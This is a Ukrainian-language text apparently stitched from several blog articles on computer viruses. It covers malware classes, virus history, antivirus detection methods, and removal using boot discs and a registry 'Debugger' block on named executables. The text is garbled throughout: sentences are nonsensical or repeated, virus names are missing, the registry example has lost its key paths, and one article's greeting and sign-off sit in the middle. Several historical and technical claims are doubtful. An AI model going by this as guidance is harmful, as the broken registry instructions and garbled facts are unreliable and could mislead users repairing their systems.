    Після видалення з реєстру всіх розділів, з ім'ям???.exe та запису "Debugger" = "ntsd -d" працездатність системи повністю відновилася.

В результаті аналізу ситуації з використанням параметра "ntsd -d" для блокування запуску виконуваних файлів, з'явилася думка використовувати цей прийом для боротьби з самими вірусами. Звичайно, це не панацея, але певною мірою може знизити загрозу зараження комп'ютера вірусами з відомими іменами виконуваних файлів. Щоб у системі неможливо було виконати файли з іменами ntos.exe, file.exe, system32.exe і т.п. можна створити reg-файл для імпорту до Реєстру:

Windows Registry Editor Version 5.00

"Debugger"="ntsd -d"
"Debugger"="ntsd -d"
"Debugger"="ntsd -d"
:.. і т.д.

Зверніть увагу, що ім'я розділу не містить шляхи файлу, тому цей спосіб не можна застосовувати для файлів вірусів, імена яких збігаються з іменами легальних виконуваних файлів, але самі файли нестандартно розміщені у файловій системі. Наприклад, провідник Explorer.exe знаходиться в папці \WINDOWS\, а вірус розташовується десь в іншому місці - в корені диска, в папці \temp, \windows\system32\ Якщо ви створите розділ з ім'ям "Explorer.exe" - то після входу в систему ви отримаєте порожній робочий стіл, оскільки провідник не запуститься. Найгірше, якщо ви створите розділ, ім'я якого збігається з ім'ям системної служби (winlogon.exe, csrss.exe, smss.exe, services.exe, lsass.exe), то отримаєте систему, що впала. Якщо вірус знаходиться в C:\temp\winlogon.exe, а легальний модуль входу в систему C:\WINDOWS\SYSTEM32\winlogon.exe, створення розділу з ім'ям winlogon.exe призведе до неможливості запуску служби winlogon та краху системи з синім екраном смерті (BSOD).

    Але, все ж таки, сподіватися на те, що код, що запитується вірусом, підійде в кожному конкретному випадку, не варто. Як не варто сподіватися на чесне самознищення вірусу, і тим більше не варто відправляти СМС. Будь-який вірус можна видалити, навіть якщо він не є антивірусами. Методики видалення вірусу-здирника нічим не відрізняються від методик видалення будь-якого іншого шкідливого ПЗ, з одним, мабуть, відзнакою - не варто витрачати час на спроби впоратися з поганою серед зараженої системи, хіба що для розвитку власних навичок і поповнення знань.

Найбільш простий і ефективний шлях - завантажитися з використанням іншої, незараженої системи і, підключившись до зараженої, видалити файли вірусу та виправити записи в реєстрі. Про це я вже писав вище, в основному статті, а тут спробую просто викласти кілька коротких варіантів видалення вірусу.

Використання Dr.Web LiveCD - найпростіший спосіб, що не вимагає спеціальних знань. Завантажуєте iso-образ CD, записуєте його на болванку, завантажуєтеся з CD-ROM і запускаєте сканер.

Використання Winternals ERD Commander. Завантажуєтеся з нього, підключившись до зараженої системи, та виконуєте відкат на контрольну точку відновлення з датою, коли зараження ще не було. Вибираєте меню System Tools - System Restore. Якщо відкат засобами ERD Commander"а виконати неможливо, спробуйте вручну знайти файли реєстру в даних контрольних точок і відновити їх у каталог Windows. Як це зробити я докладно описав у статті "Робота з реєстром".

Завантаження в іншій ОС та ручне видалення вірусу. Найскладніший, але найефективніший спосіб. В якості іншої ОС найзручніше використовувати той же ERD Commander. Методика виявлення та видалення вірусу може бути наступною:

Перейдіть на диск зараженої системи і переглядаєте системні каталоги на наявність файлів і файлів драйверів, що виконуються, з датою створення близькою до дати зараження. Переміщаєте ці файли до окремої папки. Зверніть увагу на каталоги

\Windows
\Windows\system32
\Windows\system32\drivers
\Windows\Tasks\
\RECYCLER
\System Volume Information
Каталоги користувачів \Documents And Settings\All Usersі \Documents And Settings\ім'я користувача

Дуже зручно використовувати для пошуку таких файлів FAR Manager, з увімкненим сортуванням за датою для панелі, де відображається вміст каталогу (комбінація CTRL-F5). Особливу увагу варто звернути на приховані файли, що виконуються. Існує також ефективна та проста утиліта від Nirsoft – SearchMyFiles, застосування якої дозволяє, в переважній більшості випадків, легко виявити шкідливі файли навіть без використання антивірусу. Спосіб виявлення шкідливих файлів за часом створення (Creation time)

Підключаєтеся до реєстру зараженої системи та шукаєте посилання на імена цих файлів. Сам реєстр не заважає попередньо скопіювати (повністю або принаймні ті частини, де зустрічаються вище зазначені посилання). Самі посилання видаляєте чи змінюєте у яких імена файлів інші, наприклад - file.exe на file.ex_, server.dll на server.dl_, driver.sys на driver.sy_.

Даний спосіб не вимагає особливих знань і у випадках, коли вірус не змінює дату модифікації своїх файлів (а це поки що зустрічається дуже рідко) - дає позитивний ефект. Навіть якщо вірус не є антивірусами.

Якщо попередні методики не дали результату, залишається одне – ручний пошук можливих варіантів запуску вірусу. В меню Administrative Tools ERD Commander"а є пункти:

Autoruns- інформація про параметри запуску програм та оболонку користувача.
Service and Driver Manager- інформація про служби та драйвери системи.

- Як продовження теми - як позбутися вірусів за допомогою стандартних засобів операційної системи Windows Vista\Windows 7. Використання безпечного режиму за допомогою командного рядка.

Використання завантажувального диска Winternals ERD Commander- Детальна інструкція із застосування диска аварійного відновлення системи, створеного на базі Microsoft Diagnostic and Recovery Toolset (MS DaRT).

Сайт Олега Зайцева, автора AVZ.- присвячений інформаційній безпеці, і зокрема - застосуванню однієї з найефективніших антивірусних утиліт AVZ.

Відновлення системи після вірусного зараженняЯк відновити працездатність Windows після видалення вірусу, що пошкодив деякі налаштування. Допомагає у випадках, коли не запускаються програми, під заміні сторінок, що відкриваються оглядачем, підміні домашньої сторінки, сторінки пошуку, при зміні налаштувань робочого столу, неможливості запуску редактора реєстру, відсутності доступу до Інтернету, недоступності деяких сайтів тощо.

Здрастуйте дорогі читачі мого блогу, хочу познайомити вас з комп'ютерними вірусами, щоб ви мали певне уявлення про те, що це таке і як із цим боротися. І так давайте приступимо.

Комп'ютерні віруси становлять серйозну загрозу для користувачів у всьому світі. Причому небезпека комп'ютерних вірусів може загрожувати як збереження інформації чи працездатності системи, чи комп'ютерного заліза. Останнім часом комп'ютерні шкідливі програми все частіше використовуються для виманювання у користувачів грошових коштів за допомогою отримання паролів та кодів доступу до банківських карток та рахунків. У результаті віруси завдають ще й матеріальних збитків, тому з ними не тільки можна, а й обов'язково слід боротися всіма можливими способами.

Що таке комп'ютерний вірус?

Комп'ютерний вірус здебільшого є невеликою програмою або частиною програмного коду, який поміщається в тіло виконуваного файлу або документа. Під час запуску ураженого файлу вірус починає свою шкідливу роботу.

Для більшої ефективності віруси автоматично після першого запуску створюють свою копію, поміщають заражений файл в автозавантаження, намагаються поширювати тіло вірусу через локальну мережу, тим самим заражаючи дедалі більше файлів і комп'ютерів у мережі. Потрапити віруси на комп'ютер користувача можуть у різний спосіб.

Найчастіше зараження відбувається після запуску вже зараженого файлу, який може потрапити вам електронною поштою, скопійований з флешки або диска, а також при завантаженні програм із сумнівних сайтів. Часто віруси проникають на комп'ютер користувача через локальну мережу. При цьому не обов'язково щось відкривати або запускати. Віруси самі вміють шукати проломи в операційній системі і заражають у результаті системні файли, роблячи ваш комп'ютер вразливим для проникнення інших вірусів.

Класифікація комп'ютерних вірусів

Як виявляється, комп'ютерні віруси мають різний принцип дії та цілі, тому їх часто класифікують за тими чи іншими критеріями. Найчастіше шкідливі програми поділяють на чотири групи:

1. Мережеві хробаки;

2. Класичні віруси;

3. троянські програми;

4. Інше шкідливе ПЗ.

У цьому кожна група має власну додаткову класифікацію. Знаючи до якої групи відносять ті чи інші віруси, можна розробити заходи щодо боротьби з вірусами та захисту комп'ютера від їхнього проникнення.

Мережеві черви

Мережеві хробаки, як можна зрозуміти з назви, є шкідливим програмним забезпеченням, яке розповсюджується через локальні мережі та мережу Інтернет. Мережеві черв'яки використовують і електронну пошту, P2P, ICQ, IRC-мережі, LAN, бездротові мережі та мережі для обміну даними між мобільними пристроями.

При цьому зараження може відбуватися після запуску файлу (вкладення в лист, посилання на вірус і т.п.), так і за допомогою отримання зараженого пакета передачі даних мережі. В останньому випадку черв'яки починають заражати відразу після попадання на комп'ютер користувача, і розміщується безпосередньо в оперативній пам'яті комп'ютера.

Поштові хробаки (Email Worm) – ці хробаки використовує для свого розповсюдження електронну пошту. Черв'як відправляє різні адреси листи, у яких є прикріплені файли, розширення яких часто ховається, а ім'я файлу має привабливе назва. Це робиться для того, щоб змусити користувача відкрити файл та запустити хробака на комп'ютер.

Також у листі може бути посилання на вірус, клікнувши по якій, користувач відкриє вірус. Поштові черв'яки, потрапляючи на комп'ютер користувача, намагаються якнайшвидше розмножитися, надсилаючи всім адресатам вашої адресної книги листи з вкладеним хробаком.

Хробаки IM Worm – практично нічим не відрізняються від хробаків поштового типу. Вони також розповсюджуються по E-Mail, проте в тілі листа є посилання на вірус, відкривши яку вірус буде використовувати ваш комп'ютер для подальшого розповсюдження самого себе.

Черв'яки файлообмінних мереж використовують для поширення P2P мережі. Користувач викладає у мережу файли, які вже заражені вірусом. Тепер користувачі, які завантажуватимуть цю роздачу, автоматично стають розповсюджувачами вірусу.

Такий простий механізм не єдиний в арсеналі P2P хробаків. Є складніший механізм поширення, коли мережевий черв'як імітує роботу P2P-мережі, у своїй запити користувача перехоплюються і оригінальні файли підміняються зараженими вірусами.

Є й інші мережеві черв'яки, які потрапляють на комп'ютер, використовуючи вразливість в операційній системі або програмному забезпеченні користувача. При цьому проникати на комп'ютер можуть зовсім нешкідливі хробаки, які лише нададуть доступ для проникнення безпосередньо вірусу, забезпечивши йому безперешкодне проникнення з боку програмного забезпечення і самої операційної системи.

Класичні віруси

Класичні віруси не розповсюджуються самостійно через мережу, а потрапляють на комп'ютер користувача, як правило, з вини самого користувача. Дуже часто це є результатом завантаження програм із сумнівних сайтів, копіювання заражених програм та файлів зі змінних носіїв, або із загальнодоступних мережевих ресурсів.

Комп'ютерні віруси поділяють у свою чергу на файлові, завантажувальні, макровіруси, скриптові, поліморфні, уявні, приховані або стелс-віруси, ретро-віруси, віруси компаньйони та інші.

Найбільшого поширення набули файлові віруси, які перезаписують себе в тіло файлів запуску програми. Після такого перезапису файл зазвичай перестає працювати та відновити такий файл, як правило, вже неможливо.

Завантажувальні віруси та трояни також мають широке поширення та заражають завантажувальну область жорсткого диска (MBR). При цьому на екрані часто виникає повідомлення, що ваш комп'ютер заблокований з ряду причин і для його розблокування необхідно отримати SMS-код (Trojan.Winlock).

Природно після відправлення повідомлення з грошового рахунку знімається сума грошей, а код розблокування може і не прийти. Інший завантажувальний вірус, який також є стелс-вірусом, AntiEXE спрямовує свій шкідливий вплив на певні файли, що виконуються (exe) і пошкоджує їх. Вірус AntiCMOS також є завантажувальним та ушкоджує інформацію, записану в CMOS пам'яті материнської плати.

Стелс-віруси – це віруси, які приховують від системи дійсну інформацію про заражений файл. Тобто в процесі звернення системи до файлу вірус передає системі інформацію про незаражений файл. В результаті, антивіруси практично не можуть виявити зміну файлу.

Однак це вірно, якщо антивірусну програму було запущено після завантаження вірусу в пам'ять комп'ютера. Тому, щоб виявити вірус, достатньо виконати сканування при завантаженні з завантажувального диска. Типовими представниками стелс-вірусів є Stoned.Monkey, Number, Beast та інші. Стелс-віруси можуть бути записані в тілі файлу, однак, при читанні такого файлу вони повідомляють системі розмір незараженого файлу, тому про такі віруси говорять, що вони мають невидимий розмір або нульовий розмір.

Ретро-віруси призначені для боротьби з антивірусним програмним забезпеченням. Такі віруси спеціально розробляються під певні антивірусні програми з метою знищення на основі вірусних сигнатур інформації про певні віруси.

Після зараження таким вірусом (його називають анти-антивірус) антивірусні програми вже не можуть захистити комп'ютер від проникнення інших вірусів, при цьому безпека комп'ютера буде під загрозою. Найнебезпечніше, що користувач буде впевнений, що антивірусна програма працює нормально. Тому такі віруси становлять найбільшу небезпеку.

Віруси-компаньйони створюють файл дублікат оригінального файлу, в який і міститься вірус. При цьому оригінальний файл, що виконується, не змінюється. При запуску програми автоматично відбувається запуск файлу-компаньйона і вірус починає заражати комп'ютер, створюючи файли дублікати з розширенням.com.

Поліморфні віруси зашифровують свій код, що дозволяє уникнути виявлення антивірусом щодо перевірки сигнатури вірусу. Складність виявлення подібних вірусів у тому, що алгоритм шифрування однієї й тієї ж вірусу у процесі зараження файлів може змінюватися, отже, і змінюється сигнатура вірусу.

Один із відомих представників поліморфних вірусів є One_Half. Цей вірус зашифровує дані на жорсткому диску, причому, поки цей вірус є в пам'яті комп'ютера, вся інформація доступна користувачеві. Після зашифрування половини жорсткого диска з'являється Disk is one half. Press any key to continue… Після цього розшифрувати інформацію можна, але для цього знадобиться час.

Макровіруси – це віруси, які заражають файли документів та використовують для цього спеціальні сценарії чи макроси. Макровіруси вважаються однією з серйозних небезпек, тому що дані віруси заражають не самі файли, що виконуються, а файли з даними. При цьому запуск вірусу та зараження документів може відбуватися на будь-якій операційній системі, що значно розширює область зараження вірусом.

Найчастіше дія макровірусу спрямовано знищення документа, у результаті його неможливо відновити. Як документи, які найчастіше заражаються макровірусами, є документи Microsoft Office. Це стало можливим, тому що Microsoft Office використовує мову програмування для написання макросів.

Тому розробники вірусів можуть використовувати можливості програмування офісних пакетів для написання вірусів. При цьому макровіруси можуть підміняти кнопки "Зберегти як" таким чином, що при збереженні документа відбувається запуск макровірусу і пошкодження документа, а також відбувається зараження шаблону, який використовується для створення нового документа.

В результаті згодом усі створювані документи будуть заражені макровірусом. Одним із найпоширеніших макровірусів є WordMacro/Nuclear, який намагається заразити шаблон документа. При цьому робить це він потай і ніяк не видає свою присутність. Вірус FormatC за певних умов може запросто відформатувати системний розділ, а макровірус Nuclear при друкуванні документа в кінці додає приписку: And finally I would like to say.

Загалом макровірусів досить багато, але кожен з них планомірно завдає шкоди документам, а це призводить до втрати важливої ​​інформації.

Скриптові віруси є мікропрограми, які написані мовою скриптів. Такі віруси можуть зустрічатися у всіляких файлах, які використовують скрипти, наприклад, exe, html та інші. Для їх написання зазвичай використовують мови Java, PHP, BAT, VBA та інші.

троянські програми.

Троянські програми є шкідливим програмним забезпеченням, спрямованим на всілякі несанкціоновані дії, наприклад доступ до паролів, крадіжка інформації, виманювання засобів користувача і т.п.

Троянські програми поруч із комп'ютерними вірусами становлять найбільшого поширення.

Троянські утиліти віддаленого адміністрування. Даний тип троянських програм спрямовано віддалене адмініструванням зараженого комп'ютера. При попаданні такого трояна на комп'ютер не з'являється жодних повідомлень, але зловмисник має доступ до всіх засобів керування комп'ютера.

Тобто зловмисник може просто пакостити (вимикати та перезавантажувати комп'ютер, закривати працюючі програми тощо) або використовувати віддалене управління для збору інформації, відкривати та зчитувати інформацію з особистих файлів, видаляти їх. Такі троянські програми є досить небезпечними.

Викрадачі паролів - троянські програми, метою яких є отримати пароль доступу до певних ресурсів. Коли такий троян оселився на комп'ютері, він починає активно шукати на машині файли, що містять паролі, реєстраційні номери, банківські рахунки та іншу важливу інформацію.

Ця інформація надсилається через мережу зловмисникам, які можуть використовувати її в своїх корисливих цілях.

Інтернет-клікери – ці троянські програми призначені для перенаправлення відвідувача певних веб-сторінок на інший сайт.

Метою таких троянів є підвищення відвідуваності сайтів або при атакі хакерської інтернет-ресурсу, а також для заманювання користувачів з метою їх подальшого зараження комп'ютерними вірусами.

Трояни проксі-сервера – здійснюють прихований доступ до тих чи інших мережевих ресурсів з метою розсилки спаму.

Шпигунські трояни – виконують зчитування всіх дій користувача, стежать за введенням тексту з клавіатури, виконують знімки екрану, стежать за рухами та кліками мишки тощо. Таким чином, зловмисники можуть отримати доступ до захищених ресурсів, банківських рахунків, вважаючи при цьому логін і пароль, що вводяться користувачем.

Руткіти – це були інструменти для отримання прав адміністратора на комп'ютері користувача. Проте зараз руткітами називають шкідливі програми, які намагаються приховати у системі певні процеси, файли, ключі реєстру тощо. Як правило, руткіти мають найменшу шкідливу дію на комп'ютер користувача.

Архівні бомби - зустрічаються рідко, проте ефект від такого роду шкідливих програм може бути просто приголомшливий (звідси назва бомба). За спроби відкрити такий архів, архіватор починає працювати неординарно.

При цьому система може зависнути або робота комп'ютера буде дуже уповільнена. Нерідко зустрічаються бомби, коли при запуску архіву вільне місце жорсткого диска починає заповнюватися логічними нулями, що швидко призводить до зупинки роботи системи. Архівні бомби зустрічаються зазвичай трьох типів: некоректний заголовок файла-архіву, повторення даних у архіві та однакові файли.

Некоректний заголовок в архіві призводить до нестандартної поведінки архіватора, який не може виконати алгоритм розархівування. В результаті це позначається на системі, яка починає різко гальмувати.

При упаковці в архів повторюваних і однакових файлів і даних досить пристойний обсяг файлів можна запакувати в незначний архів. Так відомо, що RAR архів в 200Кб може вміщати в себе до 5Гб даних, що повторюються. А безліч однакових файлів (10100 штук) дозволяє їх упакувати в зовсім невеликий RAR архів (всього 30Кб).

Ось і виходить, що при розархівуванні ця інформація заповнює величезний простір жорсткого диска, приводячи до практично повного його заповнення. Щоправда, із колосальним обсягом сучасних жорстких дисків архівні бомби зустрічаються дуже рідко.

Інші шкідливі програми.

До цієї групи шкідливих програм відносять різні програми, які практично не загрожують комп'ютеру, а необхідні для створення інших вірусів, троянів. Також це шкідливе ПЗ служить для організації DoS-атак на сервери, злому комп'ютерів та іншого.

Мережеві атаки DoS, DDoS призначені для виведення обладнання серверів з ладу за допомогою підвищення навантаження на нього до критичного. В результаті сервер зависає і всі мережеві ресурси, які він забезпечував, стають недоступними.

Програми даного типу здійснюють атаку серверів скоординовано, з управління зловмисника або за допомогою розподіленої атаки. При цьому програма поширюється на багато комп'ютерів в мережі, з яких починається атака сервера. Але користувачі цих комп'ютерів можуть навіть не підозрювати, що є учасником DoS атаки сервера.

Експлойти (Exploit, HackTool) - програмки, які призначені для злому доступу до віддалених комп'ютерів. Після злому програмою доступ до комп'ютера отримує зловмисник, який може надалі здійснювати керування цим комп'ютером.

Флуд-програми (Flood) – дані програми призначені для блокування мережевих каналів зв'язку за рахунок засмічення його марними даними.

Програми на зразок Bad-Joke, Hoax є навіть не шкідливим ПЗ, а єдиною метою такого ПЗ може бути інформування користувача помилковими повідомленнями. Такі програми працюють на психіку людини, видаючи повідомлення, які можуть налякати користувача, збити з пантелику, ввести в оману.

Шифрувальники вірусів – програми, які шифрують та приховують присутність у системі небезпечних та шкідливих програм. В результаті антивірусні програми не здатні виявити справді шкідливе програмне забезпечення.

Ознаки зараження комп'ютера вірусами.

Визначити заражена ваша система вірусом чи ні можна без обов'язкового сканування антивірусними пакетами. Дуже часто віруси уповільнюють роботу комп'ютера. Тому, якщо ви помітили, що ні з того ні з сього, комп'ютер став помітно гальмувати, слід перевірити систему антивірусом.
Наявність вірусів, які вбудовуються в програмні файли, нерідко призводить до неможливості запуску програми, а також до появи непередбачених збоїв.

Про наявність вірусів говорить і мимовільний запуск програм на комп'ютері, перезавантаження комп'ютера без вашої участі або повідомлень.

Про навантаження на систему з боку вірусів може говорити велике навантаження на жорсткий диск при простої комп'ютера. Це легко визначити за індикатором завантаження на передній панелі корпусу комп'ютера.
Віруси також часто додають себе автозапуск, якщо його відкрити, то в ньому можна помітити незрозумілі програми. Також на диску можуть з'являтись дублікати файлів з іншим розширенням.
Також про віруси або троян може говорити нестандартна поведінка системи, наприклад, при відкритті однієї програми, запускається інтернет-браузер. Під час відкриття браузерів змінилася стартова сторінка з невідомим ресурсом.
Якщо вам надходять повідомлення від друзів або знайомих у мережі, що від вашого імені до них надходять підозрілі повідомлення, то ваш акуаунт був зламаний або у вас на комп'ютері завів черв'як.

Як захиститись від вірусів?

Стовідсоткового захисту від вірусів немає. Жоден антивірус у світі не здатний на всі 100% захистити систему від проникнення. Більше того, якщо хакер має намір зламати ваш комп'ютер, то будьте певні, що він це зробить неодмінно.

Однак існують прості правила, щоб звести всі спроби шкідливого програмного забезпечення нанівець. По-перше, обов'язково має бути встановлена ​​в системі антивірусна програма. По-друге, не довіряйте повідомленням, що надходять, з вкладеними файлами. Такі повідомлення повинні перевірятись антивірусами.

Це стосується і файлів, які ви збираєтеся скопіювати собі на комп'ютер з флешки або оптичного диска. По-третє, уникайте сайтів, на яких багато рекламних банерів та при переході за посиланнями відкриваються додаткові вкладки в браузері.

Проводьте регулярне сканування антивірусом усієї системи. Використовуйте для захисту мережі мережні екрани, фаєрволи та брандмауери.

Будьте підозрілими і лише тоді ви зможете дати гідну відсіч натиску постійно зростаючої кількості вірусів та шпигунських програм.

Ну на цьому всі шановні читачі, сподіваюся для вас стаття була цікавою та пізнавальною, всім поки що і до нових зустрічей!

Також з цієї теми дивіться відео:

Віруси - найвідоміша і найпоширеніша електронна загроза. Майже кожен власник комп'ютера одно чи пізно стикається з цією інфекцією, але мало хто знає, що ж є комп'ютерні віруси, яким шляхом вони заражають комп'ютер, як розмножуються і чим відрізняються один від одного, і - головне - як з ними боротися.

Власне, на більшість найпопулярніших питань, що стосуються комп'ютерних вірусом, можна відповісти, просто давши суворе визначення цього типу загроз. Отже, комп'ютерний вірус- це окремий різновид програм для комп'ютера, що відрізняється деструктивними функціями (знищення даних, блокування доступу до документів, пошкодження програм) та здатністю до розмноження.

Трішки історії
Перш ніж розпочати розгляд різних класифікацій вірусів, давайте згадаємо їхню історію.
Вперше програми, що самовідтворюються, були описані ще самим Джоном фон Нейманом в 1951 році. Першу модель такої програми описали подружжя Пенроуз у статті для журналу Nature в 1957 році, після чого Ф. Ж. Шталь написав машинною мовою ЕОМ IBM 650 біокібернетичну модель, в рамках якої віртуальні істоти рухалися, «живлячись» символами, що вводяться з клавіатури. Після "поїдання" певної кількості символів істота розмножувалася, причому частина його функцій могла "мутувати". Ця програма, однак, не була вірусом як таким, оскільки не мала здатність до зараження і не несла ніяких деструктивних функцій.
Першим «справжніми» вірусами стали програми для комп'ютерів Apple, що з'явилися в 1977 році, і вміли об'єднуватися в мережу. Ці віруси "розмножувалися" "вручну" - автори викладали їх під виглядом корисних програм на BBS (попередники сучасних форумів та чатів) і після запуску знищували дані користувачів. Причому деякі модифікації цих протовірусів могли виявляти свою справжню сутність через певний час або за певних умов.

Перший вірус, який отримав популярність серед користувачів, був написаний в 1981 Річардом Скрентом. Зараза, що отримала назву ELK CLONER, впроваджувалась у завантажувальний запис диска Apple II і виявляла себе виведенням повідомлення з невеликим віршем. У тому ж році студент Техаського університету A&M Джо Деллінджер створив вірус для операційної системи комп'ютерів Apple II, який заважав нормальній роботі популярної на той час гри CONGO. Протягом кількох тижнів копії цієї гри, що є на комп'ютерах університету, перестали працювати і автор «зарази» вирішив написати перший «антивірус» — модифікацію вірусу, яка заміняла код свого попередника.
Власне термін «комп'ютерний вірус» був уперше запропонований у вересні 1984 Ф. Коен. Його стаття, де описав результати свого дослідження шкідливих програм, стала другим академічним дослідженням нової проблеми.
Перші серйозні епідемії вірусів відбулися в 1987 рік, коли широкого поширення набули дешеві комп'ютери IBM PC. Так, вірус Brain («Пакистанський вірус»), написаний братами Амджатом та Базітом Алві був виявлений влітку 1987 року, коли епідемія вразила 18 тисяч комп'ютерів у США. Вірус цей, щоправда, був свого роду «карою» для користувачів, які використовують неліцензійні програми тих самих розробників. Що цікаво, цей вірус був першим, який використовував маскування - при спробі читання зараженого сектора він «віддавав» незаражений оригінал.

Перший вірус, спочатку орієнтований зараження цілих мереж, виник 1988 року. Цей "черв'як", втім, не ніс ніяких деструктивних дій і був створений Робертом Моррісом з єдиною метою - заразити операційну систему UNIX Berkeley 4.3 на всіх комп'ютерах, підключених до мережі ARPANET, ніяк не виявивши себе. Досягши своєї мети, цей вірус починав розмножуватися та розсилати свої копії. Загалом черв'як Морріса вразив понад 6 тисяч комп'ютерів, частина з яких (через активне розмноження вірусу) вийшла з ладу на кілька днів (до виявлення джерела проблем та виправлення помилок в ОС). Двома роками пізніше Морріс був визнаний винним у заподіянні матеріальних збитків (неможливість використання мережі протягом декількох днів) і був засуджений до умовного ув'язнення терміном на два роки, 400 годин громадських робіт та штрафу в 10 тисяч доларів.
На рік пізніше «хробака Морріса», 1989 року, з'явився перший «троянський кінь». Вірус з назвою AIDS (ВІЛ) блокував доступ до всієї інформації на жорсткому диску, попутно відображаючи на екрані напис «Пришліть чек на $189 на таку адресу». Само собою, за точними координатами автора вдалося швидко вирахувати і згодом він був засуджений за здирство.
Але переломним моментом у розвитку можна вважати 1990 рік. Почалося все першого поліморфного вірусу Chameleon, який став взірцем для наслідування, тому що був ховатись від антивірусних програм. Коли ж вірусописувачі стали поєднувати у своїх творах різні методи приховування, проблема комп'ютерних вірусів набула по-справжньому глобального масштабу.

Класифікація комп'ютерних вірусів
Єдиний класифікації комп'ютерних вірусівне існує, проте силами антивірусних компаній з різних країн склалася загальноприйнята система, яка поділяє віруси на групи, що відрізняються довкіллям, способами проникнення і зараження, шкідливим діям і особливостям функціонування.

Класифікація за місцем існування . Із першою класифікацією все просто. Файлові вірусивпроваджують своє тіло у файли (читай - програми) з розширеннями *.exe, *.dll, *.sys, *.bat і *.com. Такі віруси, як та його , «присмоктуються» до носія, перехоплюючи базові управляючі функції. В результаті заражена програма при запуску насамперед виконує код вірусу, а потім - запускається сама. В окремих випадках файлові віруси повністю замінюють код програми на власне тіло, виконуючи таким чином деструктивні функції (див. нижче).
Хитро ховаються завантажувальні віруси- вони записують свій код у завантажувальний сектор диска (boot-сектор) або так звану Master Boot Record (сектор вінчестера, що містить код виклику завантажувача).
Наступний вид вірусів макро-віруси, впроваджуються вже у програми, а документи, оброблювані програмами з допомогою макросів (алгоритмів автоматизайції рутинних процесів користувача). Найчастіше від таких вірусів «страждають» документи Microsoft Word та Excel.
Строго кажучи, ця класифікація не є всеосяжною, оскільки все частіше зустрічаються віруси, здатні приховувати своє тіло відразу в кількох середовищах (наприклад, у файлах, що здійснюються, і в завантажувальному секторі).

Класифікація за способами проникнення та зараження . У міру ускладнення комп'ютерів та програмного забезпечення у вірусів з'являється все більше шляхів проникнення на комп'ютери. Найпростіший з них - запуск зараженої програми самим користувачем. Як правило, віруси, що запускаються таким методом, приходять в електронних листах або розповсюджуються під виглядом різних корисних програм (у тому числі у вигляді посилань, що надсилаються через ICQ). Причому, все частіше автори настільки простої в технічному плані зарази використовують методи соціальної інженерії, правдами і неправдами переконуючи користувача запустити вірус (наприклад, вірус може бути замаскований під картинку, від якої каверзи не чекають навіть досвідчені користувачі).
Більш прогресивні віруси використовують для запуску самого себе вбудовані функції операційних систем. Найпопулярніша з них - механізм автозапуску програм у Windows. Вставивши в USB-порт банальну флешку, можна отримати заразу, навіть не запускаючи жодних програм з цього носія - за вас все зробить файл autorun.inf, який активний вірус записав на флешку на іншому комп'ютері.
Ще один різновид вірусів - web-зараза, що потрапляє на комп'ютер із заражених сайтів. Тут все просто - браузери (особливо часто цим грішить Internet Explorer) обробляють наявний на сторінці код (найчастіше - JavaScript), який і робить "чорну справу" - наприклад, завантажує з Мережі і запускає "традиційний" програмний вірус.
Нарешті, найнебезпечніша зараза, здатна обійтися без явної чи неявної допомоги з боку користувача, це так звані «хробаки» - віруси, що проникають на комп'ютер-жертву через так звані «дірки» (уразливості)у програмах чи операційній системі. Найчастіше такі віруси використовують «вієрний» метод проникнення – кожен заражений комп'ютер стає джерелом зарази, розсилаючи нові копії вірусу всім доступним комп'ютерам.

Що стосується способів зараження , то тут всі віруси можна поділити на дві групи: резидентні(така "зараза" постійно "висить" у пам'яті комп'ютера і може не тільки робити деструктивні дії, але активно перешкоджати своєму знищенню) та нерезидентні(Після виконання певного набору дій такі віруси вивантажуються з пам'яті і не виявляють жодної активності).

Класифікація з шкідливих дій . Як не дивно, але у цій класифікації на першому місці стоять віруси нешкідливі. Зазвичай вони є «першими ластівками», на яких вірусописувачі випробовують нові технології та методи проникнення. На наступній сходинці стоять віруси безпечні, чия дія на комп'ютер обмежується різними ефектами (виведення повідомлень, заміна шпалер, звукові ефекти тощо). Третій рядок у класифікації займають небезпечні віруси, здатні призвести до збоїв у роботі комп'ютера (наприклад, блокують деякі сайти або запобігають запуску низки програм). Нарешті, існують і дуже небезпечні віруси, здатні знищити дані, пошкодити файлову систему, повністю блокувати комп'ютер тощо.

Лікування
Фактично, узагальнивши всі поширені класифікації вірусів, ми дали відповіді найпоширеніші питання вірусах, крім головного - як із нею боротися.
Як і у випадку з найкращим лікуванням буде профілактика. Простіше кажучи – використання активного антивірусного захисту (так званих моніторів). "Монітори" постійно знаходяться в пам'яті комп'ютера, контролюючи всі процеси в оперативній пам'яті комп'ютера та всі звернення до файлів.
Для разової перевірки комп'ютера (наприклад, при підозрі на зараження без «монітора») можна використовувати програми-сканери, що перевіряють операційну систему та файли користувача за запитом.
Обидва типи антивірусних програм використовують у роботі кілька алгоритмів, дозволяють виявляти «заразу». Найпоширеніший з них - «сигнатурний» (порівняльний метод, перевірка на базі). Антивірус просто використовує базу, що містить зразки коду вірусів, звіряючи фрагменти програм і документів з «еталонами». Основи створюються розробниками антивірусних програм і постійно оновлюються. При виявленні збігів антивірус може видалити інфікований файл повністю, спробувати "вилікувати" файл, видаливши тіло вірусу, заблокувати доступ до інфікованого файлу, або відправити файл до "карантину" (спеціальну папку, в якій всі дії вірусу знову блокуються).
При всій своїй ефективності сигнатурний спосіб має один істотний недолік: у випадку, якщо в основі антивіруса не знайшлася відповідна запис (що не рідкість у випадку з новими «поліморфами»), антивірус виявляється марним.
Більш ефективний метод - поведінковий (проактивний захист, поведінковий блокатор, Host Intrusion Prevention System, HIPS). Він заснований на аналізі поведінки програм та порівнянні отриманих даних з відомими антивірусу «нормальними» поведінковими алгоритмами. У разі виявлення "підозрілих" дій антивірус повідомить користувача.

У сучасних антивірусах поведінковий метод зазвичай поєднується з «евристичним», що базується на алгоритмах «припущень». Наприклад, антивірус може припустити, що програма, яка здійснює запис у завантажувальний запис диска, але при цьому не є відомою антивірусу дисковою утилітою, стає під «підозру» і може бути видалена. Такий метод, будучи непоганою підмогою у справі виявлення нових і невідомих погроз, не може, проте вважатися абсолютно надійним і використання високого рівня евристики дає найбільшу кількість помилкових спрацьовувань. До евристичних методів відносять і емуляцію програми, що перевіряється в своєрідній «віртуальній» машині, створюваної антивірусом. Наприклад, антивірус може розпочати виконання програми, інфікованої поліморфним вірусом, покроково виконуючи програму і контролюючи її події до того часу, доки переконається у її безпеки, або ж не «обчислить» вірус. Нарешті, «евристика» дозволяє перевіряти вихідний код програми (після її дизассемблирования у пам'яті), аналізуючи його можливі дії чи звіряючи фрагменти коду з відомих вірусних алгоритмів.
